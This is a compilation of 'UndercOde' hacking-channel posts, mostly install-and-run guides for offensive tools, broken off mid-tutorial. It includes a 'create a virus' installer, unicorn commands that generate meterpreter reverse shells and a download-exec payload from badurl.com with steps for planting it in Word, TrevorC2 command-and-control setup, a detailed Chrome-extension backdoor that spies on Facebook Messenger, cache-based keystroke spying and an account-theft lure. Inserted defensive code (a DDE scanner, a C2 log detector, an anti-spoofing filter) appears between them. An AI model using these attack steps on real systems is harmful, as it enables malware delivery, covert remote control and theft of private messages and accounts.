----- UndercOde -----
How to Create a Virus on Termux/Linux Without root - simple example
instagram.com/UndercodeTestingCompany
INSTALLATION & RUN:
1) apt update && apt upgrade
2) apt install git
3) apt install python && apt install python2
4) git clone https://github.com/TheReaper167/Malicious
5) cd Malicious
6) pip2 install -r requirements.txt
7) pip2 install requests
8) python2 malicious.py
9) after the virus is downloaded, open your file explorer
10) find the folder Malicious and open it
11) choose and open the folder Android if you downloaded the Android virus
Mr. BOTNET (tm)
----- UndercOde -----
Automate Cracking
For Linux & root termux
t.me/UndercOdeTestingOfficial
INSTALLATION & RUN:
1) mkdir -p hashcat/deps
2) git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL
3) cd hashcat/
4) make
5) make install
6) python wordlist_optimizer.py <input file list> <output directory>
7) python wordlist_optimizer.py wordlists.txt ../optimized_wordlists
8) hashcat --help | grep -i ntlm
5500 | NetNTLMv1 | Network protocols
5500 | NetNTLMv1 + ESS | Network protocols
5600 | NetNTLMv2 | Network protocols
1000 | NTLM | Operating-Systems
Features:
(1) Quick Crack
(2) Extensive Pure_Hate Methodology Crack
(3) Brute Force Attack
(4) Top Mask Attack
(5) Fingerprint Attack
(6) Combinator Attack
(7) Hybrid Attack
(8) Pathwell Top 100 Mask Brute Force Crack
(9) PRINCE Attack
(10) YOLO Combinator Attack
(11) Middle Combinator Attack
(12) Thorough Combinator Attack
Tested by UndercOde on:
> Ubuntu
@Mr. BOTNET (tm)
----- UndercOde -----
New 2019 release of a tool for using a PowerShell downgrade attack to inject shellcode straight into memory
> you will need a place that supports remote command injection of some sort. Oftentimes this could be through an Excel/Word doc or through psexec_commands inside of Metasploit, SQLi, etc. There are many implications and scenarios where this attack can be used
> use for learning only
instagram.com/UndercOdeTestingCompany
INSTALLATION & RUN:
1) git clone https://github.com/trustedsec/unicorn
2) cd unicorn
3) python unicorn.py
4) Commands :
> python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
> PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
> PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
> Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
> Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
> Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
> HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
> HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
> HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode hta
> DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
> CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
> Custom PS1 Example: python unicorn.py <path to ps1 file>
> Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
> Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
> Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help
To apply the payload:
1) Open Word
2) Insert tab -> Quick Parts -> Field
3) Choose = (Formula) and click ok.
4) Once the field is inserted, you should now see "!Unexpected End of Formula"
5) Right-click the Field, choose "Toggle Field Codes"
6) Paste in the code from Unicorn
7) Save the Word document.
E N J O Y
@Mr. BOTNET (tm)
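From the defender's side, the Word field steps above leave a field instruction inside the saved document, and that is something a mail gateway or triage script can look for. The scanner below is an added example, not code from the original post or from the unicorn project; the sample document is constructed in memory and its field content is a placeholder.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
DDE_FIELD = re.compile(r"^\s*DDE(AUTO)?\b", re.IGNORECASE)


def field_instructions(docx_bytes):
    """Return every field instruction in word/document.xml, rejoining split runs."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        # For untrusted files, parse with a hardened XML parser such as defusedxml.
        root = ET.fromstring(zf.read("word/document.xml"))
    found, open_fields = [], []
    for el in root.iter():                      # elements in document order
        if el.tag == W + "fldSimple":           # simple field: code in an attribute
            found.append(el.get(W + "instr", ""))
        elif el.tag == W + "fldChar":           # complex field: begin/separate/end
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                open_fields.append({"parts": [], "recorded": False})
            elif kind in ("separate", "end") and open_fields:
                field = open_fields[-1]
                if not field["recorded"]:
                    found.append("".join(field["parts"]))
                    field["recorded"] = True
                if kind == "end":
                    open_fields.pop()
        elif el.tag == W + "instrText" and open_fields:
            # The instruction may be split over several runs; collect all pieces.
            if not open_fields[-1]["recorded"]:
                open_fields[-1]["parts"].append(el.text or "")
    return found


def scan_docx(docx_bytes):
    """Return the field instructions that invoke DDE or DDEAUTO."""
    return [i.strip() for i in field_instructions(docx_bytes) if DDE_FIELD.match(i)]


def constructed_docx():
    """Build a minimal constructed .docx in memory (placeholder field content)."""
    ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    body = (
        '<w:document xmlns:w="%s"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>'
        '<w:r><w:instrText>AUTO "placeholder.exe" "constructed-argument"</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>!Unexpected End of Formula</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p><w:p><w:fldSimple w:instr=" PAGE "><w:r><w:t>1</w:t></w:r></w:fldSimple></w:p>'
        '</w:body></w:document>' % ns
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", body)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in scan_docx(constructed_docx()):
        print("suspicious field:", hit)
```

Fields can also sit in headers, footers and other document parts; this example reads only the main document part.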
----- UndercOde -----
TrevorC2 - Command and Control via Legitimate Behavior over HTTP
instagram.com/UndercOdeTestingCompany
INSTALLATION & RUN:
1) git clone https://github.com/trustedsec/trevorc2
2) cd trevorc2
3) pip install -r requirements.txt
4) trevor2_server.py
> edit the file first and customize which website you want to clone, etc. The server will clone a website of your choosing and stand up a server. This server is browsable by anyone and looks like a legitimate website. Contained within the source is a parameter (again configurable) that contains the instructions for the client. Once a client connects, it searches for that parameter, then uses it to execute commands.
5) trevor2_client.py
> all you need in any configurable option is the ability to call out to a website, parse some basic data, execute a command, and then put the results in a base64-encoded query string parameter sent to the site. That's it, not hard.
6) trevor2_client.ps1
> PowerShell implementation of trevor2_client.py; this allows you to use native PowerShell to interact with Trevor2_Server.
Dockerfile:
1) git clone https://github.com/trustedsec/trevorc2.git
2) cd trevorc2
# At this point, setting up docker-machine to remotely deploy works great
3) docker build -t trevorc2 .
4) docker run -it -p 80:80 -p 443:443 trevorc2
USE FOR LEARNING ONLY
@Mr. BOTNET (tm)
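The client behaviour described above (results returned in a base64-encoded query string parameter) is visible in web proxy logs, so it can be hunted for. The following is an added detection example, not code from the original post or from the TrevorC2 project; the log format, host names, the parameter name `id` and both thresholds are assumptions, and the log lines are constructed.

```python
import base64
import binascii
from collections import defaultdict
from urllib.parse import quote, unquote, urlsplit

MIN_B64_LEN = 24   # assumption: shorter values are too common to be useful
MIN_DISTINCT = 3   # assumption: distinct encoded values needed before alerting


def decodes_as_base64(value):
    """True if value is long enough and is strictly valid base64 (std or URL-safe)."""
    if len(value) < MIN_B64_LEN or len(value) % 4:
        return False
    try:
        base64.b64decode(value.replace("-", "+").replace("_", "/"), validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def find_encoded_channels(log_text):
    """Return {(client, host, param): distinct_values} for repeated base64 uploads."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue                          # skip malformed lines
        _, client, _, url = parts
        target = urlsplit(url)
        for pair in target.query.split("&"):
            name, _, raw = pair.partition("=")
            value = unquote(raw)              # keeps '+' intact, unlike parse_qsl
            if decodes_as_base64(value):
                seen[(client, target.hostname, name)].add(value)
    # A session token is also valid base64 but keeps the same value; a data
    # channel carries a different blob on each request.
    return {k: len(v) for k, v in seen.items() if len(v) >= MIN_DISTINCT}


def constructed_log():
    """Build constructed proxy log lines: '<time> <client> <method> <url>'."""
    lines = ["2019-11-02T10:00:00Z 10.0.0.23 GET http://news.example/index.html?page=2"]
    for n in range(3):
        # Same value on every request, like a session token.
        lines.append("2019-11-02T10:0%d:05Z 10.0.0.40 GET http://shop.example/cart"
                     "?sid=0123456789abcdef0123456789abcdef" % n)
        # A different base64 blob each time, same client, page and parameter.
        blob = base64.b64encode(b"constructed command output #%d" % n).decode()
        lines.append("2019-11-02T10:0%d:30Z 10.0.0.23 GET http://blog.example/images"
                     "?id=%s" % (n, quote(blob, safe="")))
    return "\n".join(lines)


if __name__ == "__main__":
    for (client, host, param), count in find_encoded_channels(constructed_log()).items():
        print("%s -> %s param %r: %d distinct base64 values" % (client, host, param, count))
```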
----- UndercOde -----
Test WPA3 using virtual Wi-Fi interfaces
t.me/undercOdeTestingOfficial
INSTALLATION & RUN:
1) git clone https://github.com/vanhoefm/hostap-wpa3
2) cd hostap-wpa3/hostapd
3) cp defconfig .config
4) make -j 2
5) cd ..
6) now for wpa_supplicant:
> cd wpa_supplicant
7) cp defconfig .config
8) make -j 2
9) sudo modprobe mac80211_hwsim radios=3
> rfkill unblock wifi
10) Optionally kill other Wi-Fi clients the brute-force way:
> sudo pkill wpa_supplicant
11) Open a new terminal, and in the directory hostapd execute:
> sudo ./hostapd hostapd_wpa3.conf -dd -K
12) Open another terminal, and in the directory wpa_supplicant execute:
> sudo ./wpa_supplicant -D nl80211 -i wlan1 -c supp_wpa3.conf -dd -K
Written by Mr. BOTNET (tm)
----- UndercOde -----
IP Spoofing FULL:
The term IP (Internet Protocol) address spoofing refers to the creation of IP packets with a forged (spoofed) source IP address with the purpose of concealing the identity of the sender or impersonating another computing system.
T.me/UnderCodeTestingOfficial
Why it works?
IP spoofing works because trusted services rely only on network-address-based authentication. Since an IP address is easily forged, address forgery is not difficult.
The main reason is a security weakness in the TCP protocol known as sequence number prediction.
How it works?
To completely understand how IP spoofing can take place, one must examine the structure of the TCP/IP protocol suite. A basic understanding of these headers and network exchanges is crucial to the process.
Internet Protocol (IP):
IP is a network protocol, operating at layer 3 (network) of the OSI model, that is used to route packets on a network. It is connectionless, meaning it keeps no information regarding transaction state. Additionally, there is no method in place to ensure that a packet is properly delivered to the destination.
> Examining the IP header, we can see that the first 12 bytes (or the top 3 rows of the header) contain various information about the packet. The next 8 bytes (the next 2 rows), however, contain the source and destination IP addresses. Using one of several tools, an attacker can easily modify these addresses, specifically the "source address" field.
Transmission Control Protocol (TCP):
It is the connection-oriented, reliable transport protocol in the TCP/IP suite. Connection-oriented simply means that the two hosts participating in a discussion must first establish a connection via the 3-way handshake (SYN-SYN/ACK-ACK). Reliability is provided by data sequencing and acknowledgement. TCP assigns sequence numbers to every segment and acknowledges any and all data segments received from the other end.
> The first 12 bytes of the TCP header contain port and sequencing information.
> TCP sequence numbers can simply be thought of as 32-bit counters. They range from 0 to 4,294,967,295. Every byte of data exchanged across a TCP connection (along with certain flags) is sequenced. The sequence number field in the TCP header will contain the sequence number of the *first* byte of data in the TCP segment. The acknowledgement number field in the TCP header holds the value of the next *expected* sequence number, and also acknowledges *all* data up through this ACK number minus one.
> TCP packets can be manipulated using several packet-crafting programs available on the internet.
The Attack
IP spoofing consists of several steps. First, the target host is chosen. Next, a pattern of trust is discovered, along with a trusted host. The trusted host is then disabled, and the target's TCP sequence numbers are sampled. The trusted host is impersonated, the sequence numbers guessed, and a connection attempt is made to a service that only requires address-based authentication. If successful, the attacker executes a simple command to leave a backdoor.
> Spoofing can be implemented in different ways, as given below:
Non-Blind Spoofing: This type of attack takes place when the attacker is on the same subnet as the victim. The sequence and acknowledgement numbers can be sniffed, eliminating the potential difficulty of calculating them accurately.
Blind Spoofing: Here the sequence and acknowledgement numbers are unreachable. In order to circumvent this, several packets are sent to the target machine in order to sample sequence numbers.
Usage:
IP spoofing is almost always used in what is currently one of the most difficult attacks to defend against: Denial of Service attacks, or DoS.
@Mr. BOTNET (tm)
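To make the header layout and the sequence/acknowledgement arithmetic above concrete, here is an added example (not part of the original post) that decodes those fields from raw bytes, computes the next expected ACK with 32-bit wrap-around, and applies an ingress anti-spoofing check. The internal prefix, the interface labels and the sample packets are assumptions; the packets are built in memory and never sent.

```python
import ipaddress
import struct

# Assumption for this example: address space that belongs to the protected network.
INTERNAL_PREFIXES = [ipaddress.ip_network("10.0.0.0/8")]
FIN, SYN = 0x01, 0x02


def parse_ipv4_tcp(packet):
    """Decode the IPv4/TCP header fields discussed above from raw bytes."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (packet[0] & 0x0F) * 4              # IP header length, options included
    total_len = struct.unpack("!H", packet[2:4])[0]
    if ihl < 20 or packet[9] != 6 or len(packet) < ihl + 20:
        raise ValueError("not a complete TCP/IPv4 header")
    # Bytes 12-19 of the IP header: source address, then destination address.
    src, dst = (ipaddress.ip_address(packet[i:i + 4]) for i in (12, 16))
    # First 12 bytes of the TCP header: ports, sequence and acknowledgement numbers.
    sport, dport, seq, ack = struct.unpack("!HHII", packet[ihl:ihl + 12])
    data_offset = (packet[ihl + 12] >> 4) * 4
    return {
        "src": src, "dst": dst, "sport": sport, "dport": dport,
        "seq": seq, "ack": ack, "flags": packet[ihl + 13],
        "payload_len": total_len - ihl - data_offset,
    }


def next_expected_ack(seg):
    """ACK the receiver should send back: seq plus what was consumed, mod 2**32."""
    consumed = seg["payload_len"]
    consumed += 1 if seg["flags"] & SYN else 0   # SYN and FIN each use one number
    consumed += 1 if seg["flags"] & FIN else 0
    return (seg["seq"] + consumed) % 2**32


def ingress_verdict(seg, arrived_on):
    """Anti-spoofing filter: an internal source address must not arrive from outside."""
    claims_internal = any(seg["src"] in net for net in INTERNAL_PREFIXES)
    if arrived_on == "external" and (claims_internal or seg["src"].is_loopback):
        return "drop"
    return "accept"


def sample_packet(src, dst, seq, flags, payload=b""):
    """Build constructed test bytes in memory (checksums left at zero, never sent)."""
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, seq, 0, 5 << 4, flags, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 0, 0,
                     64, 6, 0, ipaddress.ip_address(src).packed,
                     ipaddress.ip_address(dst).packed)
    return ip + tcp + payload


if __name__ == "__main__":
    seg = parse_ipv4_tcp(sample_packet("10.1.2.3", "10.9.9.9", 4294967290, 0x18,
                                       b"0123456789"))
    print(seg["src"], "->", seg["dst"], "next ACK:", next_expected_ack(seg))
    print("arrived on external interface:", ingress_verdict(seg, "external"))
```

The filter is the reason address-based trust fails only where it is missing: a border that drops outside packets claiming an inside source removes the impersonation step described above.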
----- UndercOde -----
ITWSV - Integrated Tool for Web Security Vulnerability.
ITWSV is an automated penetration testing tool which performs information gathering, auditing and reporting.
Instagram.com/UndercodeTestingCompany
INSTALLATION & RUN:
1) git clone https://github.com/penetrate2hack/ITWSV.git
2) cd ITWSV
3) chmod +x start.sh
4) chmod +x update.sh (only if required)
5) ./start.sh
FEATURES:
• WHOIS
• DNSWALK
• FIERCE
• DNSRecon
• DNSenum
• NMAP
• DMitry
• theHarvester
• LBD
• SSLScan
• SSLYze
• WhatWeb
• Automater
• Grabber
• Parsero
• Uniscan
• Metagoofil
• A2SV
• WPScan
• Droopescan
• WPSeku
• XssPy
• Spaghetti
• sublist3r
• WAFW00F
• nslookup
• dirsearch
• OWASP Joomscan
• Gobuster
TESTED ON:
> PARROT
> DEBIAN
> KALI
@Mr. BOTNET (tm)
----- UndercOde -----
How to be completely anonymous online by undercOde:
t.me/UndercOdeTestingOfficial
LET'S START:
1) use a fake MAC address for your WLAN card
2) run your Linux or Windows in a virtual machine
3) use the anonsurf tool (VPN + Tor server and much more)
> git clone https://github.com/Und3rf10w/kali-anonsurf
> cd kali-anonsurf
> ./installer.sh
4) use proxies
5) make sure you have the latest updates installed on your system
6) never maximize any browser
7) Never think you can be anonymous on a rooted or non-rooted phone
! well done
@Mr. BOTNET (tm)
----- UndercOde -----
HACK FACEBOOK MESSENGER USING CHROME BACKDOOR ?
(t.me/UndercodeTestingOfficial)
FULL GUIDE
INSTALLATION:
So first we need to git clone the tool.
1) [bash]git clone https://github.com/graniet/chromebackdoor.git[/bash]
2) We can then cd into that directory, and we need to install some dependencies.
3) [bash]apt-get install -y python-pip[/bash]
4) As we are using Ubuntu we need to install python-m2crypto
[bash]apt-get install python-m2crypto[/bash]
5) Now we can install crxmake
[bash]pip install crxmake[/bash]
6) Before we run the program it will require us to enable HTTPS. We can do this by using a built-in package within the LAMP Ubuntu server, letsencrypt
[bash]letsencrypt --apache[/bash]
7) We then need to follow the steps within the setup. First by entering a domain name, "c2.iminyour.network", followed by an email address, "dale@demmsec.co.uk". Then we need to accept the terms of service, and we only allow it to be accessed over HTTPS.
8) We can now run chromebackdoor
[bash]python chromebackdoor.py[/bash]
9) This runs the program; however, in order to create the backdoor we need to use an argument. For this we are going to use the --chrome argument
[bash]python chromebackdoor.py --chrome[/bash]
10) These next steps are kind of confusing, and the English in the program isn't well written, which doesn't help. We need to add where the website will be hosted; in this case, we use the full URL "https://c2.iminyour.network/chromebackdoor". Then we add what we think is meant to be relay, so we enter "relais" and confirm the information is correct. We are then presented with a list menu, from which for this video we use the Facebook Messenger Spy, so we enter "4", and this creates a zip folder. We can now unzip the folder
[bash]unzip 22029.zip[/bash]
11) From the files that have been extracted, we then need to change the config.php file located in the /web/includes directory using your preferred text editor. We then change the first line of the .php file to:
12) sbdd = PDO('mysql:host=localhost ; dbname=chromebackdoor', 'root','toor');
13) If you are using DigitalOcean the password file is located in
[bash]~/.digitalocean_password[/bash]
14) We can copy this and add it to our config file, so we go back to the file, amend the first line and enter our DigitalOcean password
15) sbdd = PDO('mysql:host=localhost ; dbname=chromebackdoor', 'root','newpassword');
16) We then need to install phpmyadmin and auto-configure Apache 2
[bash]apt-get install phpmyadmin[/bash]
17) We are going to use the copied password from DigitalOcean for phpmyadmin. Once the configuration has finished we can access the phpmyadmin web portal to add chromebackdoor to the database.
18) We need to locate the chromebackdoor.sql file; we can easily find this with MobaXterm using the side panel. We then create a new folder on our host machine and copy chromebackdoor.sql into the new folder. We then go back to phpmyadmin and import that file. Once that has been imported and saved we can go to that web directory, which will take us to the chromebackdoor web portal. We can use the credentials that are in chromebackdoor.sql, which are "root" and "toor". As you can see, there will be nothing in the web portal.
19) If we go back to our terminal we need to add the i386 architecture to enable us to use wine.
[bash]dpkg --add-architecture i386[/bash]
20) Then we need to install wine
[bash]apt-get install wine[/bash]
21) This will throw errors at us; however, we can run this command to fix the issue
[bash]dpkg --configure -a[/bash]
22) Now that this is done we can use the build argument for chromebackdoor
[bash]python chromebackdoor.py --build[/bash]
23) We are then asked the backdoor type; in this case it is "--chrome". We then need to enter the location of the file, "/var/www/html/chromebook/backdoor.crx". This will start the install and will throw loads of errors at us, but it's nothing to worry about. We are then given the option to use a Rubber Ducky payload; for this we choose "n"
24) We can then navigate to our payload, "https://c2.iminyour.network/chromebackdoor/bot.exe". This will download the file, and if you have anti-virus installed, it should alert you; well, it did with Avast anyway
25) We can then run the program, which will kill Chrome but will add the extension to Chrome. If we go back to the web portal we will be able to see a bot. This should now, in theory, log any Facebook messages that are sent or received while the payload is running, although this is not the case. We do a bit of troubleshooting and realize that we need to install curl [bash]apt-get install -y php-curl[/bash]
26) We then need to amend the Apache php.ini file located in /etc/php/7.0/apache2/, then search for "curl" by using ctrl + w within nano and remove the ";" from the line
27) extension=php_curl.dll
After this, restart Apache [bash]service apache2 restart[/bash] and now we can retest by sending another message, and we should be able to see messages being saved within the web portal.
I said we should, but we don't, so we need to go back to our terminal and copy our .js files to the chromebackdoor directory [bash]cp *.js ../[/bash]
We then finally need to amend the facebookmessage.js file that we have just moved. Locate the line that has "http" in it and change it to "https", and then a few lines down change the line that has "http://localhost:8888…" to our domain, "https://iminyour.network/chromebackdoor/…"
And now!! Finally!! It is working!! We should now be able to see messages being recorded!
ENJOY :)
WRITTEN BY Airlin
----- UndercOde -----
๐ฆSTEP BY STEP HOW POLICE TRACK
locate a lost CELL
t.me/UndercodeTestingOfficial
🦑Step 1 - A phone can be tracked by its IMEI number as well as by its mobile phone number. If you don't remember the IMEI number of your phone, it can easily be obtained from the telecom operator whose SIM card was being used in it. Once you give the operator your mobile number, they will tell you the IMEI number of the phone in which that SIM card was being used, because whenever you insert a SIM card into a phone and switch it on, it connects to the network and the operator automatically registers the IMEI number of the device on the network.
Step 2 - If your phone has been stolen, the person who stole it will definitely switch it off and remove and either break or throw out your SIM card. If he is intelligent enough, he will also format / wipe data / factory restore the phone so that any tracking software installed on it is removed.
Step 3 - He will then insert his own or another SIM card into the phone and switch it on. Once it connects to the network of any telecom operator, the IMEI number of your phone is registered on the network again, this time with a different mobile number.
Step 4 - The police department makes an enquiry with the telecom regulatory authority of your country about your phone's IMEI number. The authority provides the name of the telecom operator and the mobile number of the SIM card currently being used in your phone.
Step 5 - The police department then contacts the telecom operator of the mobile number whose SIM card is currently being used in your phone. The operator provides the details of all the base tower stations (mobile towers) that are currently providing network to your phone. Every BTS has a different ID that identifies its area location.
Step 6 - Whenever your phone is switched on and accessing the network, it is connected at any one time to more than one mobile tower (BTS) located in that area, but communication is made only through the tower nearest to the phone's location.
Step 7 - Now the theory of triangulation is applied to find the exact location of your phone. In this method a virtual triangle of signals (radio waves) is created between the phone and the 3 towers that are providing network to it, and the angle at which the phone lies is calculated by a mathematical formula. In this way police trace and locate any cell phone.
🦑For Android mobile phones:
Android Device Manager (no GPS required) - This is a phone-tracing tool launched by Google itself for the protection of Android devices. It works even if the SIM card of your phone is changed. The software is built into every Android phone, but you need to activate it manually: go to Settings > Security > Device administrator > Android Device Manager and activate it. Once it is activated, you can trace the location of your phone at any time over the internet by logging in at this URL:
https://www.google.com/android/devicemanager
Once you open this URL, enter your Google Play Store user name and password and you will be able to see the current location of your phone. Remember that this way of tracing a phone does not require GPS. You can also remotely wipe the data on your phone, lock it and change its password, make it ring loudly, etc., which may help in finding it. The only weak point of this application is that if the phone is hard reset / factory restored, the application will no longer work.
@ mr botnet
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
🦑What is a Side-Channel Attack?
t.me/UndercOdeTestingOfficial
🦑LET'S START:
> A side-channel attack (SCA) is a security exploit that involves collecting information about what a computing device does when it is performing cryptographic operations and using that information to reverse engineer the device's cryptography system.
> In computing, a side channel is any communication channel that is incidental to another communication channel. Security researcher Paul Kocher is credited with coining the term side-channel attack in the 1990s when he discovered it was possible to reverse engineer security tokens by monitoring a computer's power consumption and electromagnetic emissions.
> Unlike many other types of security exploits, side-channel attacks are hardware and software agnostic. Instead of targeting a software vulnerability caused by a coding error or configuration drift, the attacker exploits the way the device's operating system (OS) accesses the hardware upon which the OS runs. Side-channel attacks can be launched against any operating system, including Windows and Linux.
Powered by wii Wiki
@ Mr. BOTNET (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
🦑ALL Types of Side-Channel Attacks
instagram.com/UndercOdeTestingCompany
🦑LET'S START:
> Side-channel attacks work by monitoring the emissions produced by electronic circuits when the victim's computer is being used. In addition to exploiting information about power consumption and electromagnetic fields, an attacker may actually listen to the sounds a central processing unit (CPU) produces and use that information to reverse engineer what the computer is doing. This type of side-channel attack is called an acoustic cryptanalysis attack. Other types of side-channel attack include:
1) Cache attacks that exploit how and when cache is accessed in a physical system.
2) Differential fault analysis attacks that seek to glean information from a system by introducing faults into the system's computations.
3) Timing attacks that track the movement of data to and from a system's CPU and memory.
4) Thermal-imaging attacks that use infrared images to observe the surface of a CPU chip and collect executed code.
5) Optical side-channel attacks that collect information about hard disk activity by using an audio/visual recorder, such as a video camera.
@Mr. BOTNET (tm)
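Of the types listed above, the timing channel is the one ordinary application code creates most often: a secret comparison that returns at the first mismatch does work proportional to the number of correct leading bytes. The block below is an added example, not part of the original post; the function names and the sample token are constructed, and it counts byte comparisons instead of measuring wall-clock time so the result is deterministic.

```javascript
// Added example (not from the original post): an early-exit comparison versus
// a constant-time one. Byte comparisons are counted instead of timed so the
// result is deterministic. Secret and guesses are constructed sample values.

const bytes = (s) => new TextEncoder().encode(s);

// Leaky: stops at the first mismatch, so the amount of work (and therefore
// the response time) grows with the number of correct leading bytes.
function leakyEqual(secret, guess) {
  let steps = 0;
  if (secret.length !== guess.length) return { equal: false, steps };
  for (let i = 0; i < secret.length; i++) {
    steps++;
    if (secret[i] !== guess[i]) return { equal: false, steps };
  }
  return { equal: true, steps };
}

// Hardened: visits every byte of the secret and ORs all differences into one
// accumulator; the only branch depends on the guess length, which is public.
// In production Node.js code prefer crypto.timingSafeEqual() on equal-length
// buffers (for example HMACs of both values), because a JIT gives no timing
// guarantees for plain JavaScript loops.
function constantTimeEqual(secret, guess) {
  let steps = 0;
  let diff = secret.length ^ guess.length;
  for (let i = 0; i < secret.length; i++) {
    steps++;
    const g = i < guess.length ? guess[i] : 0;
    diff |= secret[i] ^ g;
  }
  return { equal: diff === 0, steps };
}

// Work performed for each guess: the quantity that shows up as response time
// and that a regression test can assert on.
function profile(compare, secret, guesses) {
  return guesses.map((g) => compare(secret, bytes(g)).steps);
}

// A spread of 0 means the work does not depend on how much of the guess is right.
function stepSpread(compare, secret, guesses) {
  const steps = profile(compare, secret, guesses);
  return Math.max(...steps) - Math.min(...steps);
}

const SECRET = bytes("s3cr3t-token-01"); // constructed sample value
// Same-length guesses with 0, 3, 7 and 15 correct leading bytes.
const GUESSES = ["", "s3c", "s3cr3t-", "s3cr3t-token-01"].map((p) =>
  p.padEnd(SECRET.length, "x")
);

console.log("leaky   :", profile(leakyEqual, SECRET, GUESSES));
console.log("hardened:", profile(constantTimeEqual, SECRET, GUESSES));
```

Running `stepSpread` against a project's own comparison helper in a unit test catches a regression to the early-exit form before it ships.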
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
🦑Advanced Side-Channel Analysis Tool - first step for attack (tested):
instagram.com/UndercOdeTestingCompany
🦑INSTALLATION & RUN:
1) git clone https://github.com/Ledger-Donjon/lascar
2) cd lascar
3) python3 setup.py install --user
4) cd docs/
5) make html
🦑Requirements:
> numpy
> scipy
> matplotlib: for curve visualization
> vispy: for curve visualization
> sklearn: for machine learning
> keras: for deep learning
> tensorflow: keras backend
> h5py: for data storage
> progressbar2
> pytest
> numba
🦑Tutorial:
> https://github.com/Ledger-Donjon/lascar/blob/master/tutorial/01-discovering-containers.py
> https://github.com/Ledger-Donjon/lascar/blob/master/tutorial/07-session-dpa-example.py
@Mr. BOTNET (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
🦑Dangerous tools to perform Cache Template Attacks
twitter.com/UndercOdeTC
🦑INSTALLATION & RUN:
1) git clone https://github.com/IAIK/cache_template_attacks
2) cd cache_template_attacks
3) cd calibration
4) make
5) ./calibration
🦑Running:
1) Automated keypress profiling
> cd profiling/linux_low_frequency_example
> make
> ./spy.sh 5 200 gedit # in our example we profile keypresses in gedit
2) Keypresses (with libxdotool)
In this example we perform some steps by hand to illustrate what happens in the background. Therefore, we will first find the address range to attack:
> $ cat /proc/`ps -A | grep gedit | grep -oE "^[0-9]+"`/maps | grep r-x | grep gdk-3
7fc963a05000-7fc963ab4000 r-xp 00000000 fc:01 2637370 /usr/lib/x86_64-linux-gnu/libgdk-3.so.0.1200.2
3) Switch to an already opened gedit window before ./spy is started. On Linux, run the following lines:
> cd profiling/linux_low_frequency_example
>make
> echo "switch to gedit window"
>sleep 5; ./spy 200 7fc963a05000-7fc963ab4000 r-xp 00000000 fc:01 2637370 /usr/lib/x86_64-linux-gnu/libgd
4) On Windows with MSYS/MinGW, run the following lines:
> cd profiling/windows_low_frequency_example
> mingw32-make
>echo "switch to notepad window"
> sleep 5; ./spy 200 C:\Windows\System32\notepad.exe > notepad.csv
5) This one had 126 cache hits during 122 key presses of the key N. And almost none when pressing other keys.
To verify our results we will now use the generic exploitation spy tool:
> cd exploitation/generic
> make
> ./spy /usr/lib/x86_64-linux-gnu/libgdk-3.so.0.1200.2 0x85ec0
6) OpenSSL AES T-Table attack
This example requires a self-compiled OpenSSL library to enable its T-Table-based AES implementation. Place libcrypto.so in the same folder and make sure the program actually uses it as a shared library. Then run
> cd profiling/aes_example
>make
>./spy
🦑Fully automated attack
In this example we will run a script which will automatically execute the profiling phase as described before and then switch to the multi_spy exploitation tool as soon as a result is available.
Then run
1) cd exploitation/multi_spy
2) make
3) cd ../../profiling/linux_low_frequency_automated
4) ./spy.sh 5 200 /usr/lib/x86_64-linux-gnu/libgdk-3.so.0.1200.2
@Mr. BOTNET (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
🦑How do attackers get all accounts (Netflix/Spotify/Steam...) of victims without their knowledge - tutorial by UndercOde
instagram.com/UndercOdeTestingCompany
🦑INSTALLATION & RUN:
1) git clone https://github.com/js-cookie/js-cookie
2) cd js-cookie
3) npm i js-cookie
4) Create a cookie, valid across the entire site:
Cookies.set('name', 'value')
5) Create a cookie that expires 7 days from now, valid across the entire site:
Cookies.set('name', 'value', { expires: 7 })
Create an expiring cookie, valid to the path of the current page:
Cookies.set('name', 'value', { expires: 7, path: '' })
6) Read cookie:
Cookies.get('name') // => 'value'
Cookies.get('nothing') // => undefined
7) Read all visible cookies:
